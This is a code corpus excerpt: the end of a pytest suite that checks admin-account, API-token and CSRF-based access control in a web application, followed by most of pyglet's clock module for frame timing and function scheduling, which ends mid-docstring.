([c.ADMIN, c.PEOPLE], [c.PEOPLE], None),
([c.ADMIN, c.PEOPLE], [c.ADMIN, c.PEOPLE], None),
([c.ADMIN, c.PEOPLE], [c.ADMIN, c.ACCOUNTS], None),
([c.ADMIN, c.PEOPLE], [c.ADMIN, c.ACCOUNTS, c.PEOPLE], None),
([c.ADMIN, c.PEOPLE], [c.ACCOUNTS, c.PEOPLE], None),
([c.ACCOUNTS, c.PEOPLE], [], None),
([c.ACCOUNTS, c.PEOPLE], [c.ADMIN], ACCESS_ERR),
([c.ACCOUNTS, c.PEOPLE], [c.ACCOUNTS], None),
([c.ACCOUNTS, c.PEOPLE], [c.PEOPLE], None),
([c.ACCOUNTS, c.PEOPLE], [c.ADMIN, c.PEOPLE], ACCESS_ERR),
([c.ACCOUNTS, c.PEOPLE], [c.ADMIN, c.ACCOUNTS], ACCESS_ERR),
([c.ACCOUNTS, c.PEOPLE], [c.ADMIN, c.ACCOUNTS, c.PEOPLE], ACCESS_ERR),
([c.ACCOUNTS, c.PEOPLE], [c.ACCOUNTS, c.PEOPLE], None),
]
@pytest.mark.parametrize('admin_access,access_changes,expected', TEST_ACCESS_CHANGES)
def test_check_admin_account_access_new(self, session, admin_account, admin_access, access_changes, expected):
admin_access = ','.join(map(str, admin_access))
access_changes = ','.join(map(str, access_changes))
admin_account.access = admin_access
session.commit()
session.refresh(admin_account)
test_attendee = Attendee(email='[email protected]')
session.add(test_attendee)
session.commit()
test_admin_account = AdminAccount(
access=access_changes,
attendee_id=test_attendee.id,
hashed='<bcrypted>')
message = check(test_admin_account)
assert message == expected
@pytest.mark.parametrize('admin_access,access_changes,expected', TEST_ACCESS_CHANGES)
def test_check_admin_account_access_remove(self, session, admin_account, admin_access, access_changes, expected):
admin_access = ','.join(map(str, admin_access))
access_changes = ','.join(map(str, access_changes))
admin_account.access = admin_access
session.commit()
session.refresh(admin_account)
test_attendee = Attendee(email='[email protected]')
session.add(test_attendee)
test_admin_account = AdminAccount(
access=access_changes,
attendee_id=test_attendee.id,
hashed='<bcrypted>')
session.add(test_admin_account)
session.commit()
session.refresh(test_admin_account)
test_admin_account.access = ''
message = check(test_admin_account)
assert message == expected
@pytest.mark.parametrize('admin_access,access_changes,expected', TEST_ACCESS_CHANGES)
def test_check_admin_account_access_add(self, session, admin_account, admin_access, access_changes, expected):
admin_access = ','.join(map(str, admin_access))
access_changes = ','.join(map(str, access_changes))
admin_account.access = admin_access
session.commit()
session.refresh(admin_account)
test_attendee = Attendee(email='[email protected]')
session.add(test_attendee)
test_admin_account = AdminAccount(
access='',
attendee_id=test_attendee.id,
hashed='<bcrypted>')
session.add(test_admin_account)
session.commit()
session.refresh(test_admin_account)
test_admin_account.access = access_changes
message = check(test_admin_account)
assert expected == message
class TestAuthByToken(object):
ACCESS_ERR = 'Insufficient access for auth token: {}'.format(VALID_API_TOKEN)
def test_success(self, monkeypatch, api_token):
monkeypatch.setitem(cherrypy.request.headers, 'X-Auth-Token', api_token.token)
assert None == auth_by_token(set())
@pytest.mark.parametrize('token,expected', [
(None, (401, 'Missing X-Auth-Token header')),
('XXXX', (403, 'Invalid auth token, badly formed hexadecimal UUID string: XXXX')),
('b6531a2b-eddf-4d08-9afe-0ced6376078c', (403, 'Auth token not recognized: b6531a2b-eddf-4d08-9afe-0ced6376078c')),
])
def test_failure(self, monkeypatch, token, expected):
monkeypatch.setitem(cherrypy.request.headers, 'X-Auth-Token', token)
assert auth_by_token(set()) == expected
def test_revoked(self, monkeypatch, session, api_token):
api_token.revoked_time = datetime.utcnow().replace(tzinfo=pytz.UTC)
session.commit()
session.refresh(api_token)
monkeypatch.setitem(cherrypy.request.headers, 'X-Auth-Token', api_token.token)
assert auth_by_token(set()) == (403, 'Revoked auth token: {}'.format(api_token.token))
@pytest.mark.parametrize('token_access,required_access,expected', [
([], [], None),
([], [c.API_READ], (403, ACCESS_ERR)),
([], [c.API_READ, c.API_UPDATE], (403, ACCESS_ERR)),
([c.API_READ], [], None),
([c.API_READ], [c.API_READ], None),
([c.API_READ], [c.API_READ, c.API_UPDATE], (403, ACCESS_ERR)),
([c.API_READ, c.API_UPDATE], [c.API_READ, c.API_UPDATE], None),
])
def test_insufficient_access(self, monkeypatch, session, api_token, token_access, required_access, expected):
api_token.access = ','.join(map(str, token_access))
session.commit()
session.refresh(api_token)
monkeypatch.setitem(cherrypy.request.headers, 'X-Auth-Token', api_token.token)
assert auth_by_token(set(required_access)) == expected
class TestAuthBySession(object):
ACCESS_ERR = 'Insufficient access for admin account'
def test_success(self, admin_account, csrf_token):
assert None == auth_by_session(set())
def test_check_csrf_missing_from_headers(self):
assert auth_by_session(set()) == (403, 'Your CSRF token is invalid. Please go back and try again.')
def test_check_csrf_missing_from_session(self, monkeypatch):
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', 'XXXX')
with pytest.raises(KeyError) as error:
auth_by_session(set())
def test_check_csrf_invalid(self, monkeypatch):
monkeypatch.setitem(cherrypy.session, 'csrf_token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', 'XXXX')
assert auth_by_session(set()) == (403, 'Your CSRF token is invalid. Please go back and try again.')
def test_missing_admin_account(self, monkeypatch):
monkeypatch.setitem(cherrypy.session, 'csrf_token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
assert auth_by_session(set()) == (403, 'Missing admin account in session')
def test_invalid_admin_account(self, monkeypatch):
monkeypatch.setitem(cherrypy.session, 'account_id', '4abd6dd4-8da3-44dc-8074-b2fc1b73185f')
monkeypatch.setitem(cherrypy.session, 'csrf_token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
assert auth_by_session(set()) == (403, 'Invalid admin account in session')
@pytest.mark.parametrize('admin_access,required_access,expected', [
([], [], None),
([], [c.API_READ], (403, ACCESS_ERR)),
([], [c.API_READ, c.API_UPDATE], (403, ACCESS_ERR)),
([c.API_READ], [], None),
([c.API_READ], [c.API_READ], None),
([c.API_READ], [c.API_READ, c.API_UPDATE], (403, ACCESS_ERR)),
([c.API_READ, c.API_UPDATE], [c.API_READ, c.API_UPDATE], None),
])
def test_insufficient_access(self, monkeypatch, session, admin_account, admin_access, required_access, expected):
admin_account.access = ','.join(map(str, admin_access))
session.commit()
session.refresh(admin_account)
monkeypatch.setitem(cherrypy.session, 'account_id', admin_account.id)
monkeypatch.setitem(cherrypy.session, 'csrf_token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
assert auth_by_session(set(required_access)) == expected
class TestApiAuth(object):
AUTH_BY_SESSION_ERR = 'Missing X-Auth-Token header'
AUTH_BY_TOKEN_ERR = 'Insufficient access for auth token'
TEST_REQUIRED_ACCESS = [
([], [], False),
([], [c.API_READ], True),
([], [c.API_READ, c.API_UPDATE], True),
([c.API_READ], [], False),
([c.API_READ], [c.API_READ], False),
([c.API_READ], [c.API_READ, c.API_UPDATE], True),
([c.API_READ, c.API_UPDATE], [c.API_READ, c.API_UPDATE], False),
]
@pytest.mark.parametrize('admin_access,required_access,expected', TEST_REQUIRED_ACCESS)
def test_api_auth_by_session(self, monkeypatch, session, admin_account, admin_access, required_access, expected):
@api_auth(*required_access)
def _func():
return 'SUCCESS'
admin_account.access = ','.join(map(str, admin_access))
session.commit()
session.refresh(admin_account)
monkeypatch.setitem(cherrypy.session, 'account_id', admin_account.id)
monkeypatch.setitem(cherrypy.session, 'csrf_token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
if expected:
with pytest.raises(HTTPError) as error:
_func()
assert error.type is HTTPError
assert error.value.code == 401
assert error.value._message.startswith(self.AUTH_BY_SESSION_ERR)
else:
assert 'SUCCESS' == _func()
@pytest.mark.parametrize('token_access,required_access,expected', TEST_REQUIRED_ACCESS)
def test_api_auth_by_token(self, monkeypatch, session, api_token, token_access, required_access, expected):
@api_auth(*required_access)
def _func():
return 'SUCCESS'
api_token.access = ','.join(map(str, token_access))
session.commit()
session.refresh(api_token)
monkeypatch.setitem(cherrypy.request.headers, 'X-Auth-Token', api_token.token)
if expected:
with pytest.raises(HTTPError) as error:
_func()
assert error.type is HTTPError
assert error.value.code == 403
assert error.value._message.startswith(self.AUTH_BY_TOKEN_ERR)
else:
assert 'SUCCESS' == _func()
class TestAllApiAuth(object):
AUTH_BY_SESSION_ERR = 'Missing X-Auth-Token header'
AUTH_BY_TOKEN_ERR = 'Insufficient access for auth token'
TEST_REQUIRED_ACCESS = [
([], [], False),
([], [c.API_READ], True),
([], [c.API_READ, c.API_UPDATE], True),
([c.API_READ], [], False),
([c.API_READ], [c.API_READ], False),
([c.API_READ], [c.API_READ, c.API_UPDATE], True),
([c.API_READ, c.API_UPDATE], [c.API_READ, c.API_UPDATE], False),
]
@pytest.mark.parametrize('admin_access,required_access,expected', TEST_REQUIRED_ACCESS)
def test_all_api_auth_by_session(self, monkeypatch, session, admin_account, admin_access, required_access, expected):
@all_api_auth(*required_access)
class Service(object):
def func_1(self):
return 'SUCCESS1'
def func_2(self):
return 'SUCCESS2'
service = Service()
admin_account.access = ','.join(map(str, admin_access))
session.commit()
session.refresh(admin_account)
monkeypatch.setitem(cherrypy.session, 'account_id', admin_account.id)
monkeypatch.setitem(cherrypy.session, 'csrf_token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
monkeypatch.setitem(cherrypy.request.headers, 'CSRF-Token', '74c18d5c-1a92-40f0-b5f3-924d46efafe4')
if expected:
with pytest.raises(HTTPError) as error:
service.func_1()
assert error.type is HTTPError
assert error.value.code == 401
assert error.value._message.startswith(self.AUTH_BY_SESSION_ERR)
else:
assert 'SUCCESS1' == service.func_1()
if expected:
with pytest.raises(HTTPError) as error:
service.func_2()
assert error.type is HTTPError
assert error.value.code == 401
assert error.value._message.startswith(self.AUTH_BY_SESSION_ERR)
else:
assert 'SUCCESS2' == service.func_2()
@pytest.mark.parametrize('token_access,required_access,expected', TEST_REQUIRED_ACCESS)
def test_all_api_auth_by_token(self, monkeypatch, session, api_token, token_access, required_access, expected):
@all_api_auth(*required_access)
class Service(object):
def func_1(self):
return 'SUCCESS1'
def func_2(self):
return 'SUCCESS2'
service = Service()
api_token.access = ','.join(map(str, token_access))
session.commit()
session.refresh(api_token)
monkeypatch.setitem(cherrypy.request.headers, 'X-Auth-Token', api_token.token)
if expected:
with pytest.raises(HTTPError) as error:
service.func_1()
assert error.type is HTTPError
assert error.value.code == 403
assert error.value._message.startswith(self.AUTH_BY_TOKEN_ERR)
else:
assert 'SUCCESS1' == service.func_1()
if expected:
with pytest.raises(HTTPError) as error:
service.func_2()
assert error.type is HTTPError
assert error.value.code == 403
assert error.value._message.startswith(self.AUTH_BY_TOKEN_ERR)
else:
assert 'SUCCESS2' == service.func_2()
| agpl-3.0 |
cledio66/pyglet | pyglet/clock.py | 21 | 34511 | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Precise framerate calculation, scheduling and framerate limiting.
Measuring time
==============
The `tick` and `get_fps` functions can be used in conjunction to fulfil most
games' basic requirements::
from pyglet import clock
while True:
dt = clock.tick()
# ... update and render ...
print 'FPS is %f' % clock.get_fps()
The ``dt`` value returned gives the number of seconds (as a float) since the
last "tick".
The `get_fps` function averages the framerate over a sliding window of
approximately 1 second. (You can calculate the instantaneous framerate by
taking the reciprocal of ``dt``).
Always remember to `tick` the clock!
Limiting frame-rate
===================
The framerate can be limited::
clock.set_fps_limit(60)
This causes `clock` to sleep during each `tick` in an attempt to keep the
number of ticks (frames) per second below 60.
The implementation uses platform-dependent high-resolution sleep functions
to achieve better accuracy with busy-waiting than would be possible using
just the `time` module.
Scheduling
==========
You can schedule a function to be called every time the clock is ticked::
def callback(dt):
print '%f seconds since last callback' % dt
clock.schedule(callback)
The `schedule_interval` method causes a function to be called every "n"
seconds::
clock.schedule_interval(callback, .5) # called twice a second
The `schedule_once` method causes a function to be called once "n" seconds
in the future::
clock.schedule_once(callback, 5) # called in 5 seconds
All of the `schedule` methods will pass on any additional args or keyword args
you specify to the callback function::
def animate(dt, velocity, sprite):
sprite.position += dt * velocity
clock.schedule(animate, velocity=5.0, sprite=alien)
You can cancel a function scheduled with any of these methods using
`unschedule`::
clock.unschedule(animate)
Displaying FPS
==============
The ClockDisplay class provides a simple FPS counter. You should create
an instance of ClockDisplay once during the application's start up::
fps_display = clock.ClockDisplay()
Call draw on the ClockDisplay object for each frame::
fps_display.draw()
There are several options to change the font, color and text displayed
within the __init__ method.
Using multiple clocks
=====================
The clock functions are all relayed to an instance of `Clock` which is
initialised with the module. You can get this instance to use directly::
clk = clock.get_default()
You can also replace the default clock with your own:
myclk = clock.Clock()
clock.set_default(myclk)
Each clock maintains its own set of scheduled functions and FPS
limiting/measurement. Each clock must be "ticked" separately.
Multiple and derived clocks potentially allow you to separate "game-time" and
"wall-time", or to synchronise your clock to an audio or video stream instead
of the system clock.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import time
import ctypes
import pyglet.lib
from pyglet import compat_platform
if compat_platform in ('win32', 'cygwin'):
# Win32 Sleep function is only 10-millisecond resolution, so instead
# use a waitable timer object, which has up to 100-nanosecond resolution
# (hardware and implementation dependent, of course).
_kernel32 = ctypes.windll.kernel32
class _ClockBase(object):
def __init__(self):
self._timer = _kernel32.CreateWaitableTimerA(None, True, None)
def sleep(self, microseconds):
delay = ctypes.c_longlong(int(-microseconds * 10))
_kernel32.SetWaitableTimer(self._timer, ctypes.byref(delay),
0, ctypes.c_void_p(), ctypes.c_void_p(), False)
_kernel32.WaitForSingleObject(self._timer, 0xffffffff)
_default_time_function = time.clock
else:
_c = pyglet.lib.load_library('c')
_c.usleep.argtypes = [ctypes.c_ulong]
class _ClockBase(object):
def sleep(self, microseconds):
_c.usleep(int(microseconds))
_default_time_function = time.time
class _ScheduledItem(object):
__slots__ = ['func', 'args', 'kwargs']
def __init__(self, func, args, kwargs):
self.func = func
self.args = args
self.kwargs = kwargs
class _ScheduledIntervalItem(object):
__slots__ = ['func', 'interval', 'last_ts', 'next_ts',
'args', 'kwargs']
def __init__(self, func, interval, last_ts, next_ts, args, kwargs):
self.func = func
self.interval = interval
self.last_ts = last_ts
self.next_ts = next_ts
self.args = args
self.kwargs = kwargs
def _dummy_schedule_func(*args, **kwargs):
'''Dummy function that does nothing, placed onto zombie scheduled items
to ensure they have no side effect if already queued inside tick() method.
'''
pass
class Clock(_ClockBase):
'''Class for calculating and limiting framerate, and for calling scheduled
functions.
'''
#: The minimum amount of time in seconds this clock will attempt to sleep
#: for when framerate limiting. Higher values will increase the
#: accuracy of the limiting but also increase CPU usage while
#: busy-waiting. Lower values mean the process sleeps more often, but is
#: prone to over-sleep and run at a potentially lower or uneven framerate
#: than desired.
MIN_SLEEP = 0.005
#: The amount of time in seconds this clock subtracts from sleep values
#: to compensate for lazy operating systems.
SLEEP_UNDERSHOOT = MIN_SLEEP - 0.001
# List of functions to call every tick.
_schedule_items = None
# List of schedule interval items kept in sort order.
_schedule_interval_items = None
# If True, a sleep(0) is inserted on every tick.
_force_sleep = False
def __init__(self, fps_limit=None, time_function=_default_time_function):
'''Initialise a Clock, with optional framerate limit and custom
time function.
:Parameters:
`fps_limit` : float
If not None, the maximum allowable framerate. Defaults
to None. Deprecated in pyglet 1.2.
`time_function` : function
Function to return the elapsed time of the application,
in seconds. Defaults to time.time, but can be replaced
to allow for easy time dilation effects or game pausing.
'''
super(Clock, self).__init__()
self.time = time_function
self.next_ts = self.time()
self.last_ts = None
self.times = []
self.set_fps_limit(fps_limit)
self.cumulative_time = 0
self._schedule_items = []
self._schedule_interval_items = []
def update_time(self):
'''Get the elapsed time since the last call to `update_time`.
This updates the clock's internal measure of time and returns
the difference since the last update (or since the clock was created).
:since: pyglet 1.2
:rtype: float
:return: The number of seconds since the last `update_time`, or 0
if this was the first time it was called.
'''
ts = self.time()
if self.last_ts is None:
delta_t = 0
else:
delta_t = ts - self.last_ts
self.times.insert(0, delta_t)
if len(self.times) > self.window_size:
self.cumulative_time -= self.times.pop()
self.cumulative_time += delta_t
self.last_ts = ts
return delta_t
def call_scheduled_functions(self, dt):
'''Call scheduled functions that elapsed on the last `update_time`.
:since: pyglet 1.2
:Parameters:
dt : float
The elapsed time since the last update to pass to each
scheduled function. This is *not* used to calculate which
functions have elapsed.
:rtype: bool
:return: True if any functions were called, otherwise False.
'''
ts = self.last_ts
result = False
# Call functions scheduled for every frame
# Dupe list just in case one of the items unchedules itself
for item in list(self._schedule_items):
result = True
item.func(dt, *item.args, **item.kwargs)
# Call all scheduled interval functions and reschedule for future.
need_resort = False
# Dupe list just in case one of the items unchedules itself
for item in list(self._schedule_interval_items):
if item.next_ts > ts:
break
result = True
item.func(ts - item.last_ts, *item.args, **item.kwargs)
if item.interval:
# Try to keep timing regular, even if overslept this time;
# but don't schedule in the past (which could lead to
# infinitely-worsing error).
item.next_ts = item.last_ts + item.interval
item.last_ts = ts
if item.next_ts <= ts:
if ts - item.next_ts < 0.05:
# Only missed by a little bit, keep the same schedule
item.next_ts = ts + item.interval
else:
# Missed by heaps, do a soft reschedule to avoid
# lumping everything together.
item.next_ts = self._get_soft_next_ts(ts, item.interval)
# Fake last_ts to avoid repeatedly over-scheduling in
# future. Unfortunately means the next reported dt is
# incorrect (looks like interval but actually isn't).
item.last_ts = item.next_ts - item.interval
need_resort = True
else:
item.next_ts = None
# Remove finished one-shots.
self._schedule_interval_items = \
[item for item in self._schedule_interval_items \
if item.next_ts is not None]
if need_resort:
# TODO bubble up changed items might be faster
self._schedule_interval_items.sort(key=lambda a: a.next_ts)
return result
def tick(self, poll=False):
'''Signify that one frame has passed.
This will call any scheduled functions that have elapsed.
:Parameters:
`poll` : bool
If True, the function will call any scheduled functions
but will not sleep or busy-wait for any reason. Recommended
for advanced applications managing their own sleep timers
only.
Since pyglet 1.1.
:rtype: float
:return: The number of seconds since the last "tick", or 0 if this was
the first frame.
'''
if poll:
if self.period_limit:
self.next_ts = self.next_ts + self.period_limit
else:
if self.period_limit:
self._limit()
if self._force_sleep:
self.sleep(0)
delta_t = self.update_time()
self.call_scheduled_functions(delta_t)
return delta_t
def _limit(self):
'''Sleep until the next frame is due. Called automatically by
`tick` if a framerate limit has been set.
This method uses several heuristics to determine whether to
sleep or busy-wait (or both).
'''
ts = self.time()
# Sleep to just before the desired time
sleeptime = self.get_sleep_time(False)
while sleeptime - self.SLEEP_UNDERSHOOT > self.MIN_SLEEP:
self.sleep(1000000 * (sleeptime - self.SLEEP_UNDERSHOOT))
sleeptime = self.get_sleep_time(False)
# Busy-loop CPU to get closest to the mark
sleeptime = self.next_ts - self.time()
while sleeptime > 0:
sleeptime = self.next_ts - self.time()
if sleeptime < -2 * self.period_limit:
# Missed the time by a long shot, let's reset the clock
# print >> sys.stderr, 'Step %f' % -sleeptime
self.next_ts = ts + 2 * self.period_limit
else:
# Otherwise keep the clock steady
self.next_ts = self.next_ts + self.period_limit
def get_sleep_time(self, sleep_idle):
'''Get the time until the next item is scheduled.
This method considers all scheduled items and the current
``fps_limit``, if any.
Applications can choose to continue receiving updates at the
maximum framerate during idle time (when no functions are scheduled),
or they can sleep through their idle time and allow the CPU to
switch to other processes or run in low-power mode.
If `sleep_idle` is ``True`` the latter behaviour is selected, and
``None`` will be returned if there are no scheduled items.
Otherwise, if `sleep_idle` is ``False``, a sleep time allowing
the maximum possible framerate (considering ``fps_limit``) will
be returned; or an earlier time if a scheduled function is ready.
:Parameters:
`sleep_idle` : bool
If True, the application intends to sleep through its idle
time; otherwise it will continue ticking at the maximum
frame rate allowed.
:rtype: float
:return: Time until the next scheduled event in seconds, or ``None``
if there is no event scheduled.
:since: pyglet 1.1
'''
if self._schedule_items or not sleep_idle:
if not self.period_limit:
return 0.
else:
wake_time = self.next_ts
if self._schedule_interval_items:
wake_time = min(wake_time,
self._schedule_interval_items[0].next_ts)
return max(wake_time - self.time(), 0.)
if self._schedule_interval_items:
return max(self._schedule_interval_items[0].next_ts - self.time(),
0)
return None
def set_fps_limit(self, fps_limit):
'''Set the framerate limit.
The framerate limit applies only when a function is scheduled
for every frame. That is, the framerate limit can be exceeded by
scheduling a function for a very small period of time.
:Parameters:
`fps_limit` : float
Maximum frames per second allowed, or None to disable
limiting.
:deprecated: Use `pyglet.app.run` and `schedule_interval` instead.
'''
if not fps_limit:
self.period_limit = None
else:
self.period_limit = 1. / fps_limit
self.window_size = fps_limit or 60
def get_fps_limit(self):
'''Get the framerate limit.
:rtype: float
:return: The framerate limit previously set in the constructor or
`set_fps_limit`, or None if no limit was set.
'''
if self.period_limit:
return 1. / self.period_limit
else:
return 0
def get_fps(self):
'''Get the average FPS of recent history.
The result is the average of a sliding window of the last "n" frames,
where "n" is some number designed to cover approximately 1 second.
:rtype: float
:return: The measured frames per second.
'''
if not self.cumulative_time:
return 0
return len(self.times) / self.cumulative_time
def schedule(self, func, *args, **kwargs):
'''Schedule a function to be called every frame.
The function should have a prototype that includes ``dt`` as the
first argument, which gives the elapsed time, in seconds, since the
last clock tick. Any additional arguments given to this function
are passed on to the callback::
def callback(dt, *args, **kwargs):
pass
:Parameters:
`func` : function
The function to call each frame.
'''
item = _ScheduledItem(func, args, kwargs)
self._schedule_items.append(item)
def _schedule_item(self, func, last_ts, next_ts, interval, *args, **kwargs):
item = _ScheduledIntervalItem(
func, interval, last_ts, next_ts, args, kwargs)
# Insert in sort order
for i, other in enumerate(self._schedule_interval_items):
if other.next_ts is not None and other.next_ts > next_ts:
self._schedule_interval_items.insert(i, item)
break
else:
self._schedule_interval_items.append(item)
def schedule_interval(self, func, interval, *args, **kwargs):
'''Schedule a function to be called every `interval` seconds.
Specifying an interval of 0 prevents the function from being
called again (see `schedule` to call a function as often as possible).
The callback function prototype is the same as for `schedule`.
:Parameters:
`func` : function
The function to call when the timer lapses.
`interval` : float
The number of seconds to wait between each call.
'''
last_ts = self.last_ts or self.next_ts
# Schedule from now, unless now is sufficiently close to last_ts, in
# which case use last_ts. This clusters together scheduled items that
# probably want to be scheduled together. The old (pre 1.1.1)
# behaviour was to always use self.last_ts, and not look at ts. The
# new behaviour is needed because clock ticks can now be quite
# irregular, and span several seconds.
ts = self.time()
if ts - last_ts > 0.2:
last_ts = ts
next_ts = last_ts + interval
self._schedule_item(func, last_ts, next_ts, interval, *args, **kwargs)
def schedule_interval_soft(self, func, interval, *args, **kwargs):
'''Schedule a function to be called every `interval` seconds,
beginning at a time that does not coincide with other scheduled
events.
This method is similar to `schedule_interval`, except that the
clock will move the interval out of phase with other scheduled
functions so as to distribute CPU more load evenly over time.
This is useful for functions that need to be called regularly,
but not relative to the initial start time. `pyglet.media`
does this for scheduling audio buffer updates, which need to occur
regularly -- if all audio updates are scheduled at the same time
(for example, mixing several tracks of a music score, or playing
multiple videos back simultaneously), the resulting load on the
CPU is excessive for those intervals but idle outside. Using
the soft interval scheduling, the load is more evenly distributed.
Soft interval scheduling can also be used as an easy way to schedule
graphics animations out of phase; for example, multiple flags
waving in the wind.
:since: pyglet 1.1
:Parameters:
`func` : function
The function to call when the timer lapses.
`interval` : float
The number of seconds to wait between each call.
'''
last_ts = self.last_ts or self.next_ts
# See schedule_interval
ts = self.time()
if ts - last_ts > 0.2:
last_ts = ts
next_ts = self._get_soft_next_ts(last_ts, interval)
last_ts = next_ts - interval
self._schedule_item(func, last_ts, next_ts, interval, *args, **kwargs)
def _get_soft_next_ts(self, last_ts, interval):
def taken(ts, e):
'''Return True if the given time has already got an item
scheduled nearby.
'''
for item in self._schedule_interval_items:
if item.next_ts is None:
pass
elif abs(item.next_ts - ts) <= e:
return True
elif item.next_ts > ts + e:
return False
return False
# Binary division over interval:
#
# 0 interval
# |--------------------------|
# 5 3 6 2 7 4 8 1 Order of search
#
# i.e., first scheduled at interval,
# then at interval/2
# then at interval/4
# then at interval*3/4
# then at ...
#
# Schedule is hopefully then evenly distributed for any interval,
# and any number of scheduled functions.
next_ts = last_ts + interval
if not taken(next_ts, interval / 4):
return next_ts
dt = interval
divs = 1
while True:
next_ts = last_ts
for i in range(divs - 1):
next_ts += dt
if not taken(next_ts, dt / 4):
return next_ts
dt /= 2
divs *= 2
# Avoid infinite loop in pathological case
if divs > 16:
return next_ts
def schedule_once(self, func, delay, *args, **kwargs):
'''Schedule a function to be called once after `delay` seconds.
The callback function prototype is the same as for `schedule`.
:Parameters:
`func` : function
The function to call when the timer lapses.
`delay` : float
The number of seconds to wait before the timer lapses.
'''
last_ts = self.last_ts or self.next_ts
# See schedule_interval
ts = self.time()
if ts - last_ts > 0.2:
last_ts = ts
next_ts = last_ts + delay
self._schedule_item(func, last_ts, next_ts, 0, *args, **kwargs)
def unschedule(self, func):
'''Remove a function from the schedule.
If the function appears in the schedule more than once, all occurrences
are removed. If the function was not scheduled, no error is raised.
:Parameters:
`func` : function
The function to remove from the schedule.
'''
# First replace zombie items' func with a dummy func that does
# nothing, in case the list has already been cloned inside tick().
# (Fixes issue 326).
for item in self._schedule_items:
if item.func == func:
item.func = _dummy_schedule_func
for item in self._schedule_interval_items:
if item.func == func:
item.func = _dummy_schedule_func
# Now remove matching items from both schedule lists.
self._schedule_items = \
[item for item in self._schedule_items \
if item.func is not _dummy_schedule_func]
self._schedule_interval_items = \
[item for item in self._schedule_interval_items \
if item.func is not _dummy_schedule_func]
# Default clock.
_default = Clock()
def set_default(default):
'''Set the default clock to use for all module-level functions.
By default an instance of `Clock` is used.
:Parameters:
`default` : `Clock`
The default clock to use.
'''
global _default
_default = default
def get_default():
'''Return the `Clock` instance that is used by all module-level
clock functions.
:rtype: `Clock`
:return: The default clock.
'''
return _default
def tick(poll=False):
'''Signify that one frame has passed on the default clock.
This will call any scheduled functions that have elapsed.
:Parameters:
`poll` : bool
If True, the function will call any scheduled functions
but will not sleep or busy-wait for any reason. Recommended
for advanced applications managing their own sleep timers
only.
Since pyglet 1.1.
:rtype: float
:return: The number of seconds since the last "tick", or 0 if this was the
first frame.
'''
return _default.tick(poll)
def get_sleep_time(sleep_idle):
'''Get the time until the next item is scheduled on the default clock.
See `Clock.get_sleep_time` for details.
:Parameters:
`sleep_idle` : bool
If True, the application intends to sleep through its idle
time; otherwise it will continue ticking at the maximum
frame rate allowed.
:rtype: float
:return: Time until the next scheduled event in seconds, or ``None``
if there is no event scheduled.
:since: pyglet 1.1
'''
return _default.get_sleep_time(sleep_idle)
def get_fps():
'''Return the current measured FPS of the default clock.
:rtype: float
'''
return _default.get_fps()
def set_fps_limit(fps_limit):
'''Set the framerate limit for the default clock.
:Parameters:
`fps_limit` : float
Maximum frames per second allowed, or None to disable
limiting.
:deprecated: Use `pyglet.app.run` and `schedule_interval` instead.
'''
_default.set_fps_limit(fps_limit)
def get_fps_limit():
'''Get the framerate limit for the default clock.
:return: The framerate limit previously set by `set_fps_limit`, or None if
no limit was set.
'''
return _default.get_fps_limit()
def schedule(func, *args, **kwargs):
'''Schedule 'func' to be called every frame on the default clock.
The arguments passed to func are ``dt``, followed by any ``*args`` and
``**kwargs`` given here.
:Parameters:
`func` : function
The function to call each frame.
'''
_default.schedule(func, *args, **kwargs)
def schedule_interval(func, interval, *args, **kwargs):
'''Schedule 'func' to be called every 'interval' seconds on the default
clock.
The arguments passed to 'func' are 'dt' (time since last function call),
followed by any ``*args`` and ``**kwargs`` given here.
:Parameters:
`func` : function
The function to call when the timer lapses.
`interval` : float
The number of seconds to wait between each call.
'''
_default.schedule_interval(func, interval, *args, **kwargs)
def schedule_interval_soft(func, interval, *args, **kwargs):
'''Schedule 'func' to be called every 'interval' seconds on the default
clock, beginning at a time that does not coincide with other scheduled
events.
The arguments passed to 'func' are 'dt' (time since last function call),
followed by any ``*args`` and ``**kwargs`` given here.
